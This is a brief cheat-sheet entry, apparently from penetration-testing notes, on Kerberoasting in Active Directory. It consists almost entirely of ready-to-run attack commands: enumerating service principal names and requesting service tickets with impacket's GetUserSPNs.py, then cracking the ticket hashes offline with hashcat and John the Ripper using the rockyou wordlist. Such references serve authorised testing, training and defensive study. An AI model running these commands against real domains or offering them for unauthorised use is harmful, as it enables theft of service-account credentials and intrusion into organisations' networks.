Kerberoasting
Step 1: Get the SPN (Service Principal Name)
python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>Step 2: Request a TGS (Ticket Granting Service)
python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <SERVICE_ACCOUNT>Step 3: Crack the TGS
hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txtjohn --format=krb5tgs --wordlist=$wordlist kerberoastables.txtLast updated